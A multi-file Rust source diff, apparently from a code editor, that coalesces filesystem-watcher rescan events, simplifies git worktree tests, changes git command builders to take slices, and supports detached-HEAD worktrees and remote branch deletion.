+ let is_rescan_event = event.need_rescan();
+ if is_rescan_event {
+ log::warn!(
+ "filesystem watcher lost sync for {callback_path:?}; scheduling rescan"
+ );
+ // we only keep the first event per path below, this ensures it will be the rescan event
+ // we'll remove any existing pending events for the same reason once we have the lock below
+ path_events.retain(|p| &p.path != callback_path.as_ref());
+ path_events.push(PathEvent {
+ path: callback_path.to_path_buf(),
+ kind: Some(PathEventKind::Rescan),
+ });
+ }
+
if !path_events.is_empty() {
path_events.sort();
let mut pending_paths = pending_paths.lock();
if pending_paths.is_empty() {
tx.try_send(()).ok();
}
+ coalesce_pending_rescans(&mut pending_paths, &mut path_events);
util::extend_sorted(
&mut *pending_paths,
path_events,
@@ -126,7 +144,9 @@ impl Watcher for FsWatcher {
}
})??;
- self.registrations.lock().insert(path, registration_id);
+ self.registrations
+ .lock()
+ .insert(registration_path, registration_id);
Ok(())
}
@@ -141,6 +161,56 @@ impl Watcher for FsWatcher {
}
}
+fn coalesce_pending_rescans(pending_paths: &mut Vec<PathEvent>, path_events: &mut Vec<PathEvent>) {
+ if !path_events
+ .iter()
+ .any(|event| event.kind == Some(PathEventKind::Rescan))
+ {
+ return;
+ }
+
+ let mut new_rescan_paths: Vec<std::path::PathBuf> = path_events
+ .iter()
+ .filter(|e| e.kind == Some(PathEventKind::Rescan))
+ .map(|e| e.path.clone())
+ .collect();
+ new_rescan_paths.sort_unstable();
+
+ let mut deduped_rescans: Vec<std::path::PathBuf> = Vec::with_capacity(new_rescan_paths.len());
+ for path in new_rescan_paths {
+ if deduped_rescans
+ .iter()
+ .any(|ancestor| path != *ancestor && path.starts_with(ancestor))
+ {
+ continue;
+ }
+ deduped_rescans.push(path);
+ }
+
+ deduped_rescans.retain(|new_path| {
+ !pending_paths
+ .iter()
+ .any(|pending| is_covered_rescan(pending.kind, new_path, &pending.path))
+ });
+
+ if !deduped_rescans.is_empty() {
+ pending_paths.retain(|pending| {
+ !deduped_rescans.iter().any(|rescan_path| {
+ pending.path == *rescan_path
+ || is_covered_rescan(pending.kind, &pending.path, rescan_path)
+ })
+ });
+ }
+
+ path_events.retain(|event| {
+ event.kind != Some(PathEventKind::Rescan) || deduped_rescans.contains(&event.path)
+ });
+}
+
+fn is_covered_rescan(kind: Option<PathEventKind>, path: &Path, ancestor: &Path) -> bool {
+ kind == Some(PathEventKind::Rescan) && path != ancestor && path.starts_with(ancestor)
+}
+
#[derive(Default, Debug, Copy, Clone, PartialEq, Eq, Hash)]
pub struct WatcherRegistrationId(u32);
@@ -238,6 +308,97 @@ impl GlobalWatcher {
static FS_WATCHER_INSTANCE: OnceLock<anyhow::Result<GlobalWatcher, notify::Error>> =
OnceLock::new();
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use std::path::PathBuf;
+
+ fn rescan(path: &str) -> PathEvent {
+ PathEvent {
+ path: PathBuf::from(path),
+ kind: Some(PathEventKind::Rescan),
+ }
+ }
+
+ fn changed(path: &str) -> PathEvent {
+ PathEvent {
+ path: PathBuf::from(path),
+ kind: Some(PathEventKind::Changed),
+ }
+ }
+
+ struct TestCase {
+ name: &'static str,
+ pending_paths: Vec<PathEvent>,
+ path_events: Vec<PathEvent>,
+ expected_pending_paths: Vec<PathEvent>,
+ expected_path_events: Vec<PathEvent>,
+ }
+
+ #[test]
+ fn test_coalesce_pending_rescans() {
+ let test_cases = [
+ TestCase {
+ name: "coalesces descendant rescans under pending ancestor",
+ pending_paths: vec![rescan("/root")],
+ path_events: vec![rescan("/root/child"), rescan("/root/child/grandchild")],
+ expected_pending_paths: vec![rescan("/root")],
+ expected_path_events: vec![],
+ },
+ TestCase {
+ name: "new ancestor rescan replaces pending descendant rescans",
+ pending_paths: vec![
+ changed("/other"),
+ rescan("/root/child"),
+ rescan("/root/child/grandchild"),
+ ],
+ path_events: vec![rescan("/root")],
+ expected_pending_paths: vec![changed("/other")],
+ expected_path_events: vec![rescan("/root")],
+ },
+ TestCase {
+ name: "same path rescan replaces pending non-rescan event",
+ pending_paths: vec![changed("/root")],
+ path_events: vec![rescan("/root")],
+ expected_pending_paths: vec![],
+ expected_path_events: vec![rescan("/root")],
+ },
+ TestCase {
+ name: "unrelated rescans are preserved",
+ pending_paths: vec![rescan("/root-a")],
+ path_events: vec![rescan("/root-b")],
+ expected_pending_paths: vec![rescan("/root-a")],
+ expected_path_events: vec![rescan("/root-b")],
+ },
+ TestCase {
+ name: "batch ancestor rescan replaces descendant rescan",
+ pending_paths: vec![],
+ path_events: vec![rescan("/root/child"), rescan("/root")],
+ expected_pending_paths: vec![],
+ expected_path_events: vec![rescan("/root")],
+ },
+ ];
+
+ for test_case in test_cases {
+ let mut pending_paths = test_case.pending_paths;
+ let mut path_events = test_case.path_events;
+
+ coalesce_pending_rescans(&mut pending_paths, &mut path_events);
+
+ assert_eq!(
+ pending_paths, test_case.expected_pending_paths,
+ "pending_paths mismatch for case: {}",
+ test_case.name
+ );
+ assert_eq!(
+ path_events, test_case.expected_path_events,
+ "path_events mismatch for case: {}",
+ test_case.name
+ );
+ }
+ }
+}
+
fn handle_event(event: Result<notify::Event, notify::Error>) {
log::trace!("global handle event: {event:?}");
// Filter out access events, which could lead to a weird bug on Linux after upgrading notify
@@ -6,139 +6,111 @@ use util::path;
#[gpui::test]
async fn test_fake_worktree_lifecycle(cx: &mut TestAppContext) {
- let worktree_dir_settings = &["../worktrees", ".git/zed-worktrees", "my-worktrees/"];
-
- for worktree_dir_setting in worktree_dir_settings {
- let fs = FakeFs::new(cx.executor());
- fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"}))
- .await;
- let repo = fs
- .open_repo(Path::new("/project/.git"), None)
- .expect("should open fake repo");
-
- // Initially only the main worktree exists
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 1);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
-
- let expected_dir = git::repository::resolve_worktree_directory(
- Path::new("/project"),
- worktree_dir_setting,
- );
-
- // Create a worktree
- repo.create_worktree(
- "feature-branch".to_string(),
- expected_dir.clone(),
- Some("abc123".to_string()),
- )
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree("/project", json!({".git": {}, "file.txt": "content"}))
+ .await;
+ let repo = fs
+ .open_repo(Path::new("/project/.git"), None)
+ .expect("should open fake repo");
+
+ // Initially only the main worktree exists
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 1);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+
+ fs.create_dir("/my-worktrees".as_ref()).await.unwrap();
+ let worktrees_dir = Path::new("/my-worktrees");
+
+ // Create a worktree
+ let worktree_1_dir = worktrees_dir.join("feature-branch");
+ repo.create_worktree(
+ "feature-branch".to_string(),
+ worktree_1_dir.clone(),
+ Some("abc123".to_string()),
+ )
+ .await
+ .unwrap();
+
+ // List worktrees — should have main + one created
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 2);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+ assert_eq!(worktrees[1].path, worktree_1_dir);
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
+ assert_eq!(worktrees[1].sha.as_ref(), "abc123");
+
+ // Directory should exist in FakeFs after create
+ assert!(fs.is_dir(&worktrees_dir.join("feature-branch")).await);
+
+ // Create a second worktree (without explicit commit)
+ let worktree_2_dir = worktrees_dir.join("bugfix-branch");
+ repo.create_worktree("bugfix-branch".to_string(), worktree_2_dir.clone(), None)
.await
.unwrap();
- // List worktrees — should have main + one created
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 2);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
- assert_eq!(
- worktrees[1].path,
- expected_dir.join("feature-branch"),
- "failed for worktree_directory setting: {worktree_dir_setting:?}"
- );
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
- assert_eq!(worktrees[1].sha.as_ref(), "abc123");
-
- // Directory should exist in FakeFs after create
- assert!(
- fs.is_dir(&expected_dir.join("feature-branch")).await,
- "worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}"
- );
-
- // Create a second worktree (without explicit commit)
- repo.create_worktree("bugfix-branch".to_string(), expected_dir.clone(), None)
- .await
- .unwrap();
-
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 3);
- assert!(
- fs.is_dir(&expected_dir.join("bugfix-branch")).await,
- "second worktree directory should be created in FakeFs for setting {worktree_dir_setting:?}"
- );
-
- // Rename the first worktree
- repo.rename_worktree(
- expected_dir.join("feature-branch"),
- expected_dir.join("renamed-branch"),
- )
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 3);
+ assert!(fs.is_dir(&worktree_2_dir).await);
+
+ // Rename the first worktree
+ repo.rename_worktree(worktree_1_dir, worktrees_dir.join("renamed-branch"))
.await
.unwrap();
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 3);
- assert!(
- worktrees
- .iter()
- .any(|w| w.path == expected_dir.join("renamed-branch")),
- "renamed worktree should exist at new path for setting {worktree_dir_setting:?}"
- );
- assert!(
- worktrees
- .iter()
- .all(|w| w.path != expected_dir.join("feature-branch")),
- "old path should no longer exist for setting {worktree_dir_setting:?}"
- );
-
- // Directory should be moved in FakeFs after rename
- assert!(
- !fs.is_dir(&expected_dir.join("feature-branch")).await,
- "old worktree directory should not exist after rename for setting {worktree_dir_setting:?}"
- );
- assert!(
- fs.is_dir(&expected_dir.join("renamed-branch")).await,
- "new worktree directory should exist after rename for setting {worktree_dir_setting:?}"
- );
-
- // Rename a nonexistent worktree should fail
- let result = repo
- .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere"))
- .await;
- assert!(result.is_err());
-
- // Remove a worktree
- repo.remove_worktree(expected_dir.join("renamed-branch"), false)
- .await
- .unwrap();
-
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 2);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
- assert_eq!(worktrees[1].path, expected_dir.join("bugfix-branch"));
-
- // Directory should be removed from FakeFs after remove
- assert!(
- !fs.is_dir(&expected_dir.join("renamed-branch")).await,
- "worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}"
- );
-
- // Remove a nonexistent worktree should fail
- let result = repo
- .remove_worktree(PathBuf::from("/nonexistent"), false)
- .await;
- assert!(result.is_err());
-
- // Remove the last worktree
- repo.remove_worktree(expected_dir.join("bugfix-branch"), false)
- .await
- .unwrap();
-
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 1);
- assert_eq!(worktrees[0].path, PathBuf::from("/project"));
- assert!(
- !fs.is_dir(&expected_dir.join("bugfix-branch")).await,
- "last worktree directory should be removed from FakeFs for setting {worktree_dir_setting:?}"
- );
- }
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 3);
+ assert!(
+ worktrees
+ .iter()
+ .any(|w| w.path == worktrees_dir.join("renamed-branch")),
+ );
+ assert!(
+ worktrees
+ .iter()
+ .all(|w| w.path != worktrees_dir.join("feature-branch")),
+ );
+
+ // Directory should be moved in FakeFs after rename
+ assert!(!fs.is_dir(&worktrees_dir.join("feature-branch")).await);
+ assert!(fs.is_dir(&worktrees_dir.join("renamed-branch")).await);
+
+ // Rename a nonexistent worktree should fail
+ let result = repo
+ .rename_worktree(PathBuf::from("/nonexistent"), PathBuf::from("/somewhere"))
+ .await;
+ assert!(result.is_err());
+
+ // Remove a worktree
+ repo.remove_worktree(worktrees_dir.join("renamed-branch"), false)
+ .await
+ .unwrap();
+
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 2);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+ assert_eq!(worktrees[1].path, worktree_2_dir);
+
+ // Directory should be removed from FakeFs after remove
+ assert!(!fs.is_dir(&worktrees_dir.join("renamed-branch")).await);
+
+ // Remove a nonexistent worktree should fail
+ let result = repo
+ .remove_worktree(PathBuf::from("/nonexistent"), false)
+ .await;
+ assert!(result.is_err());
+
+ // Remove the last worktree
+ repo.remove_worktree(worktree_2_dir.clone(), false)
+ .await
+ .unwrap();
+
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 1);
+ assert_eq!(worktrees[0].path, PathBuf::from("/project"));
+ assert!(!fs.is_dir(&worktree_2_dir).await);
}
#[gpui::test]
@@ -1,10 +1,14 @@
use std::{
+ collections::BTreeSet,
io::Write,
path::{Path, PathBuf},
+ time::Duration,
};
+use futures::{FutureExt, StreamExt};
+
use fs::*;
-use gpui::BackgroundExecutor;
+use gpui::{BackgroundExecutor, TestAppContext};
use serde_json::json;
use tempfile::TempDir;
use util::path;
@@ -621,3 +625,90 @@ async fn test_realfs_symlink_loop_metadata(executor: BackgroundExecutor) {
assert!(!metadata.is_executable);
// don't care about len or mtime on symlinks?
}
+
+#[gpui::test]
+#[ignore = "stress test; run explicitly when needed"]
+async fn test_realfs_watch_stress_reports_missed_paths(
+ executor: BackgroundExecutor,
+ cx: &mut TestAppContext,
+) {
+ const FILE_COUNT: usize = 32000;
+ cx.executor().allow_parking();
+
+ let fs = RealFs::new(None, executor.clone());
+ let temp_dir = TempDir::new().expect("create temp dir");
+ let root = temp_dir.path();
+
+ let mut file_paths = Vec::with_capacity(FILE_COUNT);
+ let mut expected_paths = BTreeSet::new();
+
+ for index in 0..FILE_COUNT {
+ let dir_path = root.join(format!("dir-{index:04}"));
+ let file_path = dir_path.join("file.txt");
+ fs.create_dir(&dir_path).await.expect("create watched dir");
+ fs.write(&file_path, b"before")
+ .await
+ .expect("create initial file");
+ expected_paths.insert(file_path.clone());
+ file_paths.push(file_path);
+ }
+
+ let (mut events, watcher) = fs.watch(root, Duration::from_millis(10)).await;
+ let _watcher = watcher;
+
+ for file_path in &expected_paths {
+ _watcher
+ .add(file_path.parent().expect("file has parent"))
+ .expect("add explicit directory watch");
+ }
+
+ for (index, file_path) in file_paths.iter().enumerate() {
+ let content = format!("after-{index}");
+ fs.write(file_path, content.as_bytes())
+ .await
+ .expect("modify watched file");
+ }
+
+ let mut changed_paths = BTreeSet::new();
+ let mut rescan_count: u32 = 0;
+ let timeout = executor.timer(Duration::from_secs(10)).fuse();
+
+ futures::pin_mut!(timeout);
+
+ let mut ticks = 0;
+ while ticks < 1000 {
+ if let Some(batch) = events.next().fuse().now_or_never().flatten() {
+ for event in batch {
+ if event.kind == Some(PathEventKind::Rescan) {
+ rescan_count += 1;
+ }
+ if expected_paths.contains(&event.path) {
+ changed_paths.insert(event.path);
+ }
+ }
+ if changed_paths.len() == expected_paths.len() {
+ break;
+ }
+ ticks = 0;
+ } else {
+ ticks += 1;
+ executor.timer(Duration::from_millis(10)).await;
+ }
+ }
+
+ let missed_paths: BTreeSet<_> = expected_paths.difference(&changed_paths).cloned().collect();
+
+ eprintln!(
+ "realfs watch stress: expected={}, observed={}, missed={}, rescan={}",
+ expected_paths.len(),
+ changed_paths.len(),
+ missed_paths.len(),
+ rescan_count
+ );
+
+ assert!(
+ missed_paths.is_empty() || rescan_count > 0,
+ "missed {} paths without rescan being reported",
+ missed_paths.len()
+ );
+}
@@ -58,7 +58,7 @@ async fn run_git_blame(
let mut child = {
let span = ztracing::debug_span!("spawning git-blame command", path = path.as_unix_str());
let _enter = span.enter();
- git.build_command(["blame", "--incremental", "--contents", "-"])
+ git.build_command(&["blame", "--incremental", "--contents", "-"])
.arg(path.as_unix_str())
.stdin(Stdio::piped())
.stdout(Stdio::piped())
@@ -81,7 +81,7 @@ pub(crate) async fn get_messages(git: &GitBinary, shas: &[Oid]) -> Result<HashMa
async fn get_messages_impl(git: &GitBinary, shas: &[Oid]) -> Result<Vec<String>> {
const MARKER: &str = "<MARKER>";
let output = git
- .build_command(["show"])
+ .build_command(&["show"])
.arg("-s")
.arg(format!("--format=%B{}", MARKER))
.args(shas.iter().map(ToString::to_string))
@@ -91,7 +91,7 @@ async fn get_messages_impl(git: &GitBinary, shas: &[Oid]) -> Result<Vec<String>>
anyhow::ensure!(
output.status.success(),
"'git show' failed with error {:?}",
- output.status
+ String::from_utf8_lossy(&output.stderr)
);
Ok(String::from_utf8_lossy(&output.stdout)
.trim()
@@ -36,7 +36,7 @@ use thiserror::Error;
use util::command::{Stdio, new_command};
use util::paths::PathStyle;
use util::rel_path::RelPath;
-use util::{ResultExt, normalize_path, paths};
+use util::{ResultExt, paths};
use uuid::Uuid;
pub use askpass::{AskPassDelegate, AskPassResult, AskPassSession};
@@ -76,97 +76,6 @@ pub fn original_repo_path_from_common_dir(common_dir: &Path) -> PathBuf {
}
}
-/// Resolves the configured worktree directory to an absolute path.
-///
-/// `worktree_directory_setting` is the raw string from the user setting
-/// (e.g. `"../worktrees"`, `".git/zed-worktrees"`, `"my-worktrees/"`).
-/// Trailing slashes are stripped. The path is resolved relative to
-/// `working_directory` (the repository's working directory root).
-///
-/// When the resolved directory falls outside the working directory
-/// (e.g. `"../worktrees"`), the repository's directory name is
-/// automatically appended so that sibling repos don't collide.
-/// For example, with working directory `~/code/zed` and setting
-/// `"../worktrees"`, this returns `~/code/worktrees/zed`.
-///
-/// When the resolved directory is inside the working directory
-/// (e.g. `".git/zed-worktrees"`), no extra component is added
-/// because the path is already project-scoped.
-pub fn resolve_worktree_directory(
- working_directory: &Path,
- worktree_directory_setting: &str,
-) -> PathBuf {
- let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']);
- let joined = working_directory.join(trimmed);
- let resolved = normalize_path(&joined);
-
- if resolved.starts_with(working_directory) {
- resolved
- } else if let Some(repo_dir_name) = working_directory.file_name() {
- resolved.join(repo_dir_name)
- } else {
- resolved
- }
-}
-
-/// Validates that the resolved worktree directory is acceptable:
-/// - The setting must not be an absolute path.
-/// - The resolved path must be either a subdirectory of the working
-/// directory or a subdirectory of its parent (i.e., a sibling).
-///
-/// Returns `Ok(resolved_path)` or an error with a user-facing message.
-pub fn validate_worktree_directory(
- working_directory: &Path,
- worktree_directory_setting: &str,
-) -> Result<PathBuf> {
- // Check the original setting before trimming, since a path like "///"
- // is absolute but becomes "" after stripping trailing separators.
- // Also check for leading `/` or `\` explicitly, because on Windows
- // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees`
- // would slip through even though it's clearly not a relative path.
- if Path::new(worktree_directory_setting).is_absolute()
- || worktree_directory_setting.starts_with('/')
- || worktree_directory_setting.starts_with('\\')
- {
- anyhow::bail!(
- "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}"
- );
- }
-
- if worktree_directory_setting.is_empty() {
- anyhow::bail!("git.worktree_directory must not be empty");
- }
-
- let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']);
- if trimmed == ".." {
- anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)");
- }
-
- let resolved = resolve_worktree_directory(working_directory, worktree_directory_setting);
-
- let parent = working_directory.parent().unwrap_or(working_directory);
-
- if !resolved.starts_with(parent) {
- anyhow::bail!(
- "git.worktree_directory resolved to {resolved:?}, which is outside \
- the project root and its parent directory. It must resolve to a \
- subdirectory of {working_directory:?} or a sibling of it."
- );
- }
-
- Ok(resolved)
-}
-
-/// Returns the full absolute path for a specific branch's worktree
-/// given the resolved worktree directory.
-pub fn worktree_path_for_branch(
- working_directory: &Path,
- worktree_directory_setting: &str,
- branch: &str,
-) -> PathBuf {
- resolve_worktree_directory(working_directory, worktree_directory_setting).join(branch)
-}
-
/// Commit data needed for the git graph visualization.
#[derive(Debug, Clone)]
pub struct GraphCommitData {
@@ -303,18 +212,25 @@ impl Branch {
#[derive(Clone, Debug, Hash, PartialEq, Eq)]
pub struct Worktree {
pub path: PathBuf,
- pub ref_name: SharedString,
+ pub ref_name: Option<SharedString>,
// todo(git_worktree) This type should be a Oid
pub sha: SharedString,
}
impl Worktree {
- pub fn branch(&self) -> &str {
- self.ref_name
- .as_ref()
- .strip_prefix("refs/heads/")
- .or_else(|| self.ref_name.as_ref().strip_prefix("refs/remotes/"))
- .unwrap_or(self.ref_name.as_ref())
+ /// Returns a display name for the worktree, suitable for use in the UI.
+ ///
+ /// If the worktree is attached to a branch, returns the branch name.
+ /// Otherwise, returns the short SHA of the worktree's HEAD commit.
+ pub fn display_name(&self) -> &str {
+ match self.ref_name {
+ Some(ref ref_name) => ref_name
+ .strip_prefix("refs/heads/")
+ .or_else(|| ref_name.strip_prefix("refs/remotes/"))
+ .unwrap_or(ref_name),
+ // Detached HEAD — show the short SHA as a fallback.
+ None => &self.sha[..self.sha.len().min(SHORT_SHA_LENGTH)],
+ }
}
}
@@ -342,12 +258,10 @@ pub fn parse_worktrees_from_str<T: AsRef<str>>(raw_worktrees: T) -> Vec<Worktree
// Ignore other lines: detached, bare, locked, prunable, etc.
}
- // todo(git_worktree) We should add a test for detach head state
- // a detach head will have ref_name as none so we would skip it
- if let (Some(path), Some(sha), Some(ref_name)) = (path, sha, ref_name) {
+ if let (Some(path), Some(sha)) = (path, sha) {
worktrees.push(Worktree {
path: PathBuf::from(path),
- ref_name: ref_name.into(),
+ ref_name: ref_name.map(Into::into),
sha: sha.into(),
})
}
@@ -763,14 +677,14 @@ pub trait GitRepository: Send + Sync {
-> BoxFuture<'_, Result<()>>;
fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>>;
- fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>>;
+ fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>>;
fn worktrees(&self) -> BoxFuture<'_, Result<Vec<Worktree>>>;
fn create_worktree(
&self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
from_commit: Option<String>,
) -> BoxFuture<'_, Result<()>>;
@@ -1000,11 +914,18 @@ impl RealGitRepository {
bundled_git_binary_path: Option<PathBuf>,
system_git_binary_path: Option<PathBuf>,
executor: BackgroundExecutor,
- ) -> Option<Self> {
- let any_git_binary_path = system_git_binary_path.clone().or(bundled_git_binary_path)?;
- let workdir_root = dotgit_path.parent()?;
- let repository = git2::Repository::open(workdir_root).log_err()?;
- Some(Self {
+ ) -> Result<Self> {
+ let any_git_binary_path = system_git_binary_path
+ .clone()
+ .or(bundled_git_binary_path)
+ .context("no git binary available")?;
+ log::info!(
+ "opening git repository at {dotgit_path:?} using git binary {any_git_binary_path:?}"
+ );
+ let workdir_root = dotgit_path.parent().context(".git has no parent")?;
+ let repository =
+ git2::Repository::open(workdir_root).context("creating libgit2 repository")?;
+ Ok(Self {
repository: Arc::new(Mutex::new(repository)),
system_git_binary_path,
any_git_binary_path,
@@ -1027,6 +948,7 @@ impl RealGitRepository {
self.any_git_binary_path.clone(),
self.working_directory()
.with_context(|| "Can't run git commands without a working directory")?,
+ self.path(),
self.executor.clone(),
self.is_trusted(),
))
@@ -1039,7 +961,7 @@ impl RealGitRepository {
let git_binary = self.git_binary();
let output: SharedString = self
.executor
- .spawn(async move { git_binary?.run(["help", "-a"]).await })
+ .spawn(async move { git_binary?.run(&["help", "-a"]).await })
.await
.unwrap_or_default()
.into();
@@ -1081,14 +1003,18 @@ pub async fn get_git_committer(cx: &AsyncApp) -> GitCommitter {
let git = GitBinary::new(
git_binary_path.unwrap_or(PathBuf::from("git")),
paths::home_dir().clone(),
+ paths::home_dir().join(".git"),
cx.background_executor().clone(),
true,
);
cx.background_spawn(async move {
- let name = git.run(["config", "--global", "user.name"]).await.log_err();
+ let name = git
+ .run(&["config", "--global", "user.name"])
+ .await
+ .log_err();
let email = git
- .run(["config", "--global", "user.email"])
+ .run(&["config", "--global", "user.email"])
.await
.log_err();
GitCommitter { name, email }
@@ -1119,7 +1045,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command([
+ .build_command(&[
"--no-optional-locks",
"show",
"--no-patch",
@@ -1157,7 +1083,7 @@ impl GitRepository for RealGitRepository {
cx.background_spawn(async move {
let git = git_binary?;
let show_output = git
- .build_command([
+ .build_command(&[
"--no-optional-locks",
"show",
"--format=",
@@ -1179,7 +1105,7 @@ impl GitRepository for RealGitRepository {
let parent_sha = format!("{}^", commit);
let mut cat_file_process = git
- .build_command(["--no-optional-locks", "cat-file", "--batch=%(objectsize)"])
+ .build_command(&["--no-optional-locks", "cat-file", "--batch=%(objectsize)"])
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped())
@@ -1295,7 +1221,7 @@ impl GitRepository for RealGitRepository {
let git = git_binary?;
let output = git
- .build_command(["reset", mode_flag, &commit])
+ .build_command(&["reset", mode_flag, &commit])
.envs(env.iter())
.output()
.await?;
@@ -1323,7 +1249,7 @@ impl GitRepository for RealGitRepository {
let git = git_binary?;
let output = git
- .build_command(["checkout", &commit, "--"])
+ .build_command(&["checkout", &commit, "--"])
.envs(env.iter())
.args(paths.iter().map(|path| path.as_unix_str()))
.output()
@@ -1427,7 +1353,7 @@ impl GitRepository for RealGitRepository {
if let Some(content) = content {
let mut child = git
- .build_command(["hash-object", "-w", "--stdin"])
+ .build_command(&["hash-object", "-w", "--stdin"])
.envs(env.iter())
.stdin(Stdio::piped())
.stdout(Stdio::piped())
@@ -1442,7 +1368,7 @@ impl GitRepository for RealGitRepository {
log::debug!("indexing SHA: {sha}, path {path:?}");
let output = git
- .build_command(["update-index", "--add", "--cacheinfo", mode, sha])
+ .build_command(&["update-index", "--add", "--cacheinfo", mode, sha])
.envs(env.iter())
.arg(path.as_unix_str())
.output()
@@ -1456,7 +1382,7 @@ impl GitRepository for RealGitRepository {
} else {
log::debug!("removing path {path:?} from the index");
let output = git
- .build_command(["update-index", "--force-remove"])
+ .build_command(&["update-index", "--force-remove"])
.envs(env.iter())
.arg(path.as_unix_str())
.output()
@@ -1491,7 +1417,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let mut process = git
- .build_command([
+ .build_command(&[
"--no-optional-locks",
"cat-file",
"--batch-check=%(objectname)",
@@ -1551,7 +1477,7 @@ impl GitRepository for RealGitRepository {
let args = git_status_args(path_prefixes);
log::debug!("Checking for git status in {path_prefixes:?}");
self.executor.spawn(async move {
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
if output.status.success() {
let stdout = String::from_utf8_lossy(&output.stdout);
stdout.parse()
@@ -1589,7 +1515,7 @@ impl GitRepository for RealGitRepository {
self.executor
.spawn(async move {
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
if output.status.success() {
let stdout = String::from_utf8_lossy(&output.stdout);
stdout.parse()
@@ -1645,7 +1571,7 @@ impl GitRepository for RealGitRepository {
&fields,
];
let git = git_binary?;
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
anyhow::ensure!(
output.status.success(),
@@ -1659,7 +1585,7 @@ impl GitRepository for RealGitRepository {
if branches.is_empty() {
let args = vec!["symbolic-ref", "--quiet", "HEAD"];
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
// git symbolic-ref returns a non-0 exit code if HEAD points
// to something other than a branch
@@ -1702,20 +1628,19 @@ impl GitRepository for RealGitRepository {
fn create_worktree(
&self,
- name: String,
- directory: PathBuf,
+ branch_name: String,
+ path: PathBuf,
from_commit: Option<String>,
) -> BoxFuture<'_, Result<()>> {
let git_binary = self.git_binary();
- let final_path = directory.join(&name);
let mut args = vec![
OsString::from("--no-optional-locks"),
OsString::from("worktree"),
OsString::from("add"),
OsString::from("-b"),
- OsString::from(name.as_str()),
+ OsString::from(branch_name.as_str()),
OsString::from("--"),
- OsString::from(final_path.as_os_str()),
+ OsString::from(path.as_os_str()),
];
if let Some(from_commit) = from_commit {
args.push(OsString::from(from_commit));
@@ -1725,9 +1650,9 @@ impl GitRepository for RealGitRepository {
self.executor
.spawn(async move {
- std::fs::create_dir_all(final_path.parent().unwrap_or(&final_path))?;
+ std::fs::create_dir_all(path.parent().unwrap_or(&path))?;
let git = git_binary?;
- let output = git.build_command(args).output().await?;
+ let output = git.build_command(&args).output().await?;
if output.status.success() {
Ok(())
} else {
@@ -1753,7 +1678,7 @@ impl GitRepository for RealGitRepository {
}
args.push("--".into());
args.push(path.as_os_str().into());
- git_binary?.run(args).await?;
+ git_binary?.run(&args).await?;
anyhow::Ok(())
})
.boxed()
@@ -1772,7 +1697,7 @@ impl GitRepository for RealGitRepository {
old_path.as_os_str().into(),
new_path.as_os_str().into(),
];
- git_binary?.run(args).await?;
+ git_binary?.run(&args).await?;
anyhow::Ok(())
})
.boxed()
@@ -1856,12 +1781,14 @@ impl GitRepository for RealGitRepository {
.boxed()
}
- fn delete_branch(&self, name: String) -> BoxFuture<'_, Result<()>> {
+ fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> {
let git_binary = self.git_binary();
self.executor
.spawn(async move {
- git_binary?.run(&["branch", "-d", &name]).await?;
+ git_binary?
+ .run(&["branch", if is_remote { "-dr" } else { "-d" }, &name])
+ .await?;
anyhow::Ok(())
})
.boxed()
@@ -1975,11 +1902,11 @@ impl GitRepository for RealGitRepository {
let git = git_binary?;
let output = match diff {
DiffType::HeadToIndex => {
- git.build_command(["diff", "--staged"]).output().await?
+ git.build_command(&["diff", "--staged"]).output().await?
}
- DiffType::HeadToWorktree => git.build_command(["diff"]).output().await?,
+ DiffType::HeadToWorktree => git.build_command(&["diff"]).output().await?,
DiffType::MergeBase { base_ref } => {
- git.build_command(["diff", "--merge-base", base_ref.as_ref()])
+ git.build_command(&["diff", "--merge-base", base_ref.as_ref()])
.output()
.await?
}
@@ -2036,7 +1963,7 @@ impl GitRepository for RealGitRepository {
